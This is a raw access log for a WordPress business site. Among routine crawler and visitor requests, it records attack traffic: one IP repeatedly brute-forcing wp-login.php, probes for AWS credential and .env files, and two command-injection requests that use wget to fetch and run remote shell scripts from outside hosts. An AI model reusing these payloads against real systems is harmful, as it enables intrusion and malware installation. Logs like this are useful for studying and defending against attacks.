20.171.207.83 - - [11/Aug/2025:01:55:46 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Flogistics%2F HTTP/1.1" 200 1116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:47 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fcontacts%2F HTTP/1.1" 200 1113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:49 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fservices%2F HTTP/1.1" 200 1111 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:50 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2159%2F HTTP/1.1" 200 1299 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:51 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2153%2F HTTP/1.1" 200 1250 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:52 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2160%2F HTTP/1.1" 200 1243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:53 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2155%2F HTTP/1.1" 200 1256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:54 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2163%2F HTTP/1.1" 200 1235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:55 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2165%2F HTTP/1.1" 200 1233 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
46.250.232.76 - - [11/Aug/2025:01:55:57 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
20.171.207.83 - - [11/Aug/2025:01:55:57 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2162%2F HTTP/1.1" 200 1265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:58 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2052%2F HTTP/1.1" 200 1232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:55:59 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2164%2F HTTP/1.1" 200 1232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:00 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fabout%2F HTTP/1.1" 200 1102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:01 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fportfolio%2F%25e5%2586%25b7%25e8%25bd%25a7%25e6%259d%25bf%2F HTTP/1.1" 200 1220 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:02 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F HTTP/1.1" 200 1096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:07 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fportfolio%2F%25e5%2586%25b7%25e8%25bd%25a7%25e5%258d%25b7%2F HTTP/1.1" 200 1205 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:19 +0800] "GET /wp-content/plugins/elementor/assets/lib/swiper/v8/swiper-bundle.min.js.map HTTP/1.1" 404 9424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:29 +0800] "GET /wp-content/themes/qizhou/js/'+a(this).attr(e.core.s.exThumbImage)+' HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:30 +0800] "GET /wp-content/themes/qizhou/js/+a(this).attr(e.core.s.exThumbImage)+ HTTP/1.1" 404 9423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:30 +0800] "GET /wp-content/themes/qizhou/js/'+a(this).find( HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:31 +0800] "GET /wp-content/themes/qizhou/js/+a(this).find HTTP/1.1" 404 9423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:34 +0800] "GET /wp-content/themes/qizhou/js/'+f+' HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:35 +0800] "GET /wp-content/themes/qizhou/js/+f+ HTTP/1.1" 404 9423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:36 +0800] "GET /wp-content/themes/qizhou/js/'+g+' HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:37 +0800] "GET /wp-content/themes/qizhou/js/+g+ HTTP/1.1" 404 9423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:37 +0800] "GET /wp-content/themes/qizhou/js/'+e.core.s.dynamicEl[g].thumb+' HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:56:38 +0800] "GET /wp-content/themes/qizhou/js/+e.core.s.dynamicEl[g].thumb+ HTTP/1.1" 404 9424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
46.250.232.76 - - [11/Aug/2025:01:56:45 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
193.34.212.110 - - [11/Aug/2025:01:57:16 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.250.232.76 - - [11/Aug/2025:01:57:32 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:01:58:33 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
20.171.207.83 - - [11/Aug/2025:01:58:39 +0800] "GET /wp-content/uploads/2025/07/1750656103-Visionr2000x800_20250623131702.webp HTTP/1.1" 200 57650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:58:41 +0800] "GET /wp-content/uploads/2025/07/1751988544-Logistics-delivery_images_W900%C3%97300.webp HTTP/1.1" 200 26142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:58:45 +0800] "GET /wp-content/uploads/2025/07/1751967322-Storage-processing_images_W900%C3%97300.webp HTTP/1.1" 200 23120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:58:46 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.83 - - [11/Aug/2025:01:58:47 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
46.250.232.76 - - [11/Aug/2025:01:59:49 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
199.204.96.26 - - [11/Aug/2025:02:00:07 +0800] "GET / HTTP/1.1" 200 152149 "-" "-"
43.153.54.14 - - [11/Aug/2025:02:00:24 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fportfolio%2Fremaining-rolls%2F HTTP/1.1" 200 1196 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.250.232.76 - - [11/Aug/2025:02:00:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:01:29 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:02:32 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:03:52 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:04:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:05:27 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
42.236.12.206 - - [11/Aug/2025:02:06:09 +0800] "GET / HTTP/1.1" 200 33396 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
46.250.232.76 - - [11/Aug/2025:02:06:18 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:07:21 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:08:10 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:08:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
20.15.225.33 - - [11/Aug/2025:02:09:16 +0800] "GET /druid/index.html HTTP/1.1" 404 9422 "-" "Mozilla/5.0 zgrab/0.x"
46.250.232.76 - - [11/Aug/2025:02:09:44 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
149.50.96.5 - - [11/Aug/2025:02:10:24 +0800] "GET /login.asp HTTP/1.1" 301 5 "-" "-"
46.250.232.76 - - [11/Aug/2025:02:10:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:11:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:12:30 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:13:42 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:14:37 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:15:24 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:16:10 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:16:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:17:44 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:18:30 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
170.106.165.76 - - [11/Aug/2025:02:19:07 +0800] "GET /wp-content/uploads/2025/07/1753453127- HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.250.232.76 - - [11/Aug/2025:02:19:22 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
204.141.229.123 - - [11/Aug/2025:02:20:00 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:20:01 +0800] "GET / HTTP/1.1" 200 33396 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:20:12 +0800] "GET /.aws/credentials HTTP/1.1" 404 9423 "-" "python-requests/2.32.4"
46.250.232.76 - - [11/Aug/2025:02:20:13 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
204.141.229.123 - - [11/Aug/2025:02:20:21 +0800] "GET /phpinfo HTTP/1.1" 404 9423 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:20:31 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:20:40 +0800] "GET /.env.bak HTTP/1.1" 404 9422 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:20:49 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "python-requests/2.32.4"
46.250.232.76 - - [11/Aug/2025:02:20:59 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
204.141.229.123 - - [11/Aug/2025:02:21:00 +0800] "GET /config/aws.yml HTTP/1.1" 404 9422 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:21:09 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 9423 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:21:18 +0800] "GET /.aws/ HTTP/1.1" 404 9423 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:21:27 +0800] "GET /.aws/config HTTP/1.1" 404 9423 "-" "python-requests/2.32.4"
204.141.229.123 - - [11/Aug/2025:02:21:36 +0800] "GET /.config HTTP/1.1" 404 9422 "-" "python-requests/2.32.4"
46.250.232.76 - - [11/Aug/2025:02:21:44 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:22:31 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:23:16 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:24:03 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:24:50 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:25:36 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:26:23 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:27:13 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:28:09 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:28:55 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:29:39 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:30:27 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:31:12 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
43.153.54.138 - - [11/Aug/2025:02:31:26 +0800] "GET /wp-content/uploads/2025/07/1753451773- HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.250.232.76 - - [11/Aug/2025:02:32:17 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:33:30 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:34:28 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:35:39 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:36:25 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:37:10 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:37:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [11/Aug/2025:02:38:41 +0800] "POST /wp-cron.php?doing_wp_cron=1754851121.5527811050415039062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
46.250.232.76 - - [11/Aug/2025:02:38:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:39:33 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:40:19 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:41:04 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:41:50 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:42:38 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
43.166.134.114 - - [11/Aug/2025:02:42:48 +0800] "GET /wp-content/uploads/elementor/thumbs/1751209300-Hello-Qizhou3-r91b71mdtei8mab1rr8x739cnvi1mafuaga3vbed3o.webp HTTP/1.1" 200 39120 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.250.232.76 - - [11/Aug/2025:02:43:23 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:44:07 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:44:54 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:45:40 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:46:27 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:47:14 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:48:08 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
128.199.80.76 - - [11/Aug/2025:02:48:26 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
46.250.232.76 - - [11/Aug/2025:02:48:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:49:43 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
49.51.253.83 - - [11/Aug/2025:02:49:54 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.250.232.76 - - [11/Aug/2025:02:50:32 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:51:18 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:52:05 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:52:50 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:53:35 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:54:23 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:55:10 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:55:56 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:56:42 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:57:26 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:58:13 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:02:58:58 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
193.34.212.110 - - [11/Aug/2025:02:59:23 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.250.232.76 - - [11/Aug/2025:02:59:45 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:03:00:33 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:03:01:20 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:03:02:13 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
46.250.232.76 - - [11/Aug/2025:03:03:08 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
149.50.96.5 - - [11/Aug/2025:03:07:37 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0"
43.166.253.94 - - [11/Aug/2025:03:08:38 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 18814 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.156.87.165 - - [11/Aug/2025:03:10:56 +0800] "GET /login.cgi?multilingual%20show%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zta.sh%7Csh%27%24 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
43.157.53.115 - - [11/Aug/2025:03:14:56 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 17791 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.183.15 - - [11/Aug/2025:03:26:04 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 18659 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
8.222.234.236 - - [11/Aug/2025:03:28:22 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
115.159.33.43 - - [11/Aug/2025:03:33:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
45.156.87.165 - - [11/Aug/2025:03:39:20 +0800] "GET /login.cgi?cli=multilingual%20show%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zta.sh%7Csh%27%24 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
36.133.115.36 - - [11/Aug/2025:03:39:20 +0800] "POST /wp-cron.php?doing_wp_cron=1754854760.7899119853973388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [11/Aug/2025:03:39:36 +0800] "HEAD /login.action HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
49.51.204.74 - - [11/Aug/2025:03:40:01 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.204.74 - - [11/Aug/2025:03:40:09 +0800] "GET /logistics/ HTTP/1.1" 200 18354 "http://cqqizhou.com/logistics" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
